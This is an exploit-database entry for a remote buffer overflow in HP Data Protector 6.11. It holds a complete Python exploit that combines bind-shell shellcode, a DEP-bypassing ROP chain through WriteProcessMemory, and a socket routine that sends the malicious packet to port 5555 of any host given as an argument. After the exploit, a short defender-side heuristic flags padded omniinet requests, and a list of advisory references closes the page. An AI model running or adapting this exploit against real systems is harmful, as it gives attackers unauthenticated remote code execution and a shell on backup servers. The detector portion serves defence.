HP Data Protector 6.11 Remote Buffer Overflow + DEP Bypass

2011.07.03
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/python
# HP Data Protector 6.11 Remote Buffer Overflow
# Tested on Windows 2003 R2 + DEP Enabled
# Authors: muts & dookie
# Reference: http://www.exploit-db.com/exploits/17458/
# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
# http://www.offensive-security.com/0day/hp-dataprotector.py.txt
#
# Python 2 script: the string literals below are byte strings and are sent as-is.
# Usage: python hp-dataprotector.py <target host>

import struct, socket, sys

target = sys.argv[1]

# bindshell - port 4444
shellcode = ("\xbf\x83\x75\x7f\xdd\xdb\xc8\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x56\x31\x7e\x13\x03\x7e\x13\x83\xee\x7f\x97\x8a\x21\x97\xd1"
"\x75\xda\x67\x82\xfc\x3f\x56\x90\x9b\x34\xca\x24\xef\x19\xe6"
"\xcf\xbd\x89\x7d\xbd\x69\xbd\x36\x08\x4c\xf0\xc7\xbc\x50\x5e"
"\x0b\xde\x2c\x9d\x5f\x00\x0c\x6e\x92\x41\x49\x93\x5c\x13\x02"
"\xdf\xce\x84\x27\x9d\xd2\xa5\xe7\xa9\x6a\xde\x82\x6e\x1e\x54"
"\x8c\xbe\x8e\xe3\xc6\x26\xa5\xac\xf6\x57\x6a\xaf\xcb\x1e\x07"
"\x04\xbf\xa0\xc1\x54\x40\x93\x2d\x3a\x7f\x1b\xa0\x42\x47\x9c"
"\x5a\x31\xb3\xde\xe7\x42\x00\x9c\x33\xc6\x95\x06\xb0\x70\x7e"
"\xb6\x15\xe6\xf5\xb4\xd2\x6c\x51\xd9\xe5\xa1\xe9\xe5\x6e\x44"
"\x3e\x6c\x34\x63\x9a\x34\xef\x0a\xbb\x90\x5e\x32\xdb\x7d\x3f"
"\x96\x97\x6c\x54\xa0\xf5\xf8\x99\x9f\x05\xf9\xb5\xa8\x76\xcb"
"\x1a\x03\x11\x67\xd3\x8d\xe6\x88\xce\x6a\x78\x77\xf0\x8a\x50"
"\xbc\xa4\xda\xca\x15\xc4\xb0\x0a\x99\x11\x16\x5b\x35\xc9\xd7"
"\x0b\xf5\xb9\xbf\x41\xfa\xe6\xa0\x69\xd0\x91\xe6\xa7\x00\xf2"
"\x80\xc5\xb6\xe5\x0c\x43\x50\x6f\xbd\x05\xca\x07\x7f\x72\xc3"
"\xb0\x80\x50\x7f\x69\x17\xec\x69\xad\x18\xed\xbf\x9e\xb5\x45"
"\x28\x54\xd6\x51\x49\x6b\xf3\xf1\x00\x54\x94\x88\x7c\x17\x04"
"\x8c\x54\xcf\xa5\x1f\x33\x0f\xa3\x03\xec\x58\xe4\xf2\xe5\x0c"
"\x18\xac\x5f\x32\xe1\x28\xa7\xf6\x3e\x89\x26\xf7\xb3\xb5\x0c"
"\xe7\x0d\x35\x09\x53\xc2\x60\xc7\x0d\xa4\xda\xa9\xe7\x7e\xb0"
"\x63\x6f\x06\xfa\xb3\xe9\x07\xd7\x45\x15\xb9\x8e\x13\x2a\x76"
"\x47\x94\x53\x6a\xf7\x5b\x8e\x2e\x07\x16\x92\x07\x80\xff\x47"
"\x1a\xcd\xff\xb2\x59\xe8\x83\x36\x22\x0f\x9b\x33\x27\x4b\x1b"
"\xa8\x55\xc4\xce\xce\xca\xe5\xda")

# WriteProcessMemory call frame (the two placeholders are patched by the ROP chain below)
wpm = "\x55\x23\xe4\x77"   # 77E42355 WriteProcessMemory - Win2k3
wpm += "\x50\xd0\x4b\x00"  # 004bd050 omniinet.exe - Return after WPM
wpm += "\xff\xff\xff\xff"  # hProcess
wpm += "\x50\xd0\x4b\x00"  # 004bd050 omniinet.exe - Address to Patch
wpm += "\x41\x41\x41\x41"  # lpBuffer placeholder (Shellcode Address)
wpm += "\x42\x42\x42\x42"  # nSize placeholder (Shellcode Size) 00001000
wpm += "\x38\xd4\x4b\x00"  # 004BD438 omniinet.exe - Pointer for Written Bytes

# pre
packet = ("\x00\x00\x27\xCA\xFF\xFE\x32\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x32\x00\x30\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00")

# padding to EIP
packet += "A" * 2004

# Get a copy of ESP into a register for safekeeping
packet += "\x1f\x59\x37\x7c"  # 0x7c37591f PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN
packet += "\x44" * 4          # junk to pop into EBP

# Jump over the WPM parameters
packet += "\xfe\x9b\x35\x7c"  # 0x7c359bfe : # ADD ESP,20 # RETN
packet += wpm
packet += "\x44" * 4          # filler

# Get EAX to point at our shellcode on the stack and overwrite the placeholder
packet += "\x40\xa0\x35\x7c"  # 0x7c35a040 : # MOV EAX,ECX # RETN
packet += "\x1c\x3b\x37\x7c"  # 0x7c373b1c : # ADD EAX,100 # POP EBP # RETN
packet += "\x44" * 4          # filler
packet += "\xd4\x3d\x43\x00"  # 0x00433dd4 : # MOV DWORD PTR DS:[ECX+18],EAX # POP EBP # RETN ** [omniinet.exe]
packet += "\x44" * 4          # filler

# Craft the shellcode size in EAX and overwrite the placeholder
packet += "\x2e\x40\x34\x7c"  # 0x7c34402e : # POP EDX # RETN ** [MSVCR71.dll]
packet += "\x59\x3d\x41\x41"  # Value to SUB from EAX
packet += "\x23\x62\x37\x7c"  # 0x7c376223 : # POP EAX # RETN ** [MSVCR71.dll]
packet += "\x41\x41\x41\x41"  # To be the sub-ee 41413D59
packet += "\xe9\xfa\x36\x7c"  # 0x7c36fae9 : # SUB EAX,EDX # POP ESI # RETN ** [MSVCR71.dll]
packet += "\x44" * 4          # filler
packet += "\x69\x60\x37\x7c"  # 0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN ** [MSVCR71.dll]
packet += "\x44" * 12         # filler

# Point ESP to WPM and the stack and return
packet += "\x40\xa0\x35\x7c"  # 0x7c35a040 : # MOV EAX,ECX # RETN ** [MSVCR71.dll]
packet += "\x66\x61\x43\x00"  # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]
packet += "\x44" * 4          # filler
packet += "\x66\x61\x43\x00"  # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]
packet += "\x44" * 4          # filler
packet += "\x66\x61\x43\x00"  # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]
packet += "\x44" * 4          # filler
packet += "\x66\x61\x43\x00"  # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]
packet += "\x44" * 4          # filler
packet += "\x05\x8b\x34\x7c"  # 0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll]
packet += "\x45" * 8
packet += "\x90" * 120
packet += shellcode
packet += "C" * 980000

# post
packet += ("\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00")

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 5555))
sock.send(packet)
sock.close()
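A defender-side check, added here as an example and not part of the exploit above or of HP's code: it decodes the omniinet request framing visible in the exploit's "pre" bytes (a 4-byte prefix, the UTF-16 byte-order mark, then NUL-separated UTF-16LE fields) and flags requests on TCP/5555 whose fields are implausibly long or consist of one repeated character, which is how the padding the overflow relies on looks on the wire. The thresholds, the constant names and the two sample requests are assumptions constructed for this example.

```python
BOM = b"\xff\xfe"          # UTF-16LE byte-order mark seen at offset 4 of the request
MAX_MESSAGE_LEN = 65536    # assumed upper bound for a legitimate request
MAX_FIELD_LEN = 512        # assumed upper bound for a legitimate field
MIN_RUN_LEN = 64           # assumed: a field this long made of one repeated char is padding


def split_fields(payload):
    """Return the NUL-separated UTF-16LE fields that follow the 4-byte prefix and
    the BOM, or None when the payload does not carry that framing."""
    if len(payload) < 6 or payload[4:6] != BOM:
        return None
    body = payload[6:]
    if len(body) % 2:
        body = body[:-1]               # keep the decoder on 2-byte units
    return body.decode("utf-16-le", errors="replace").split("\x00")


def suspicious(payload):
    """Heuristic findings for one omniinet request; an empty list means nothing
    unusual was seen. Raw single-byte padding such as 'A' * 2004 decodes to a run
    of one repeated UTF-16 code unit, which is what the run check catches."""
    fields = split_fields(payload)
    if fields is None:
        return []
    findings = []
    if len(payload) > MAX_MESSAGE_LEN:
        findings.append(f"request of {len(payload)} bytes exceeds {MAX_MESSAGE_LEN}")
    for i, field in enumerate(fields):
        if len(field) > MAX_FIELD_LEN:
            findings.append(f"field {i} is {len(field)} characters long")
        if len(field) >= MIN_RUN_LEN and len(set(field)) == 1:
            findings.append(f"field {i} is a {len(field)}-character run of {field[0]!r}")
    return findings


# Constructed samples: a short request with the same framing as the exploit's
# "pre" bytes, and one carrying the kind of raw padding the overflow uses.
PREFIX = b"\x00\x00\x27\xca"
BENIGN = PREFIX + BOM + "2\x00 a\x00 a\x00 20\x00 a".encode("utf-16-le")
PADDED = (PREFIX + BOM + "2\x00 a\x00".encode("utf-16-le")
          + b"A" * 2004 + "\x00".encode("utf-16-le") + b"C" * 2000)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("padded", PADDED)):
        print(name, suspicious(sample) or "ok")
```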

References:

http://xforce.iss.net/xforce/xfdb/68281
http://www.securityfocus.com/bid/48486
http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
http://securitytracker.com/id?1025731
http://secunia.com/advisories/45100
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182


Copyright 2024, cxsecurity.com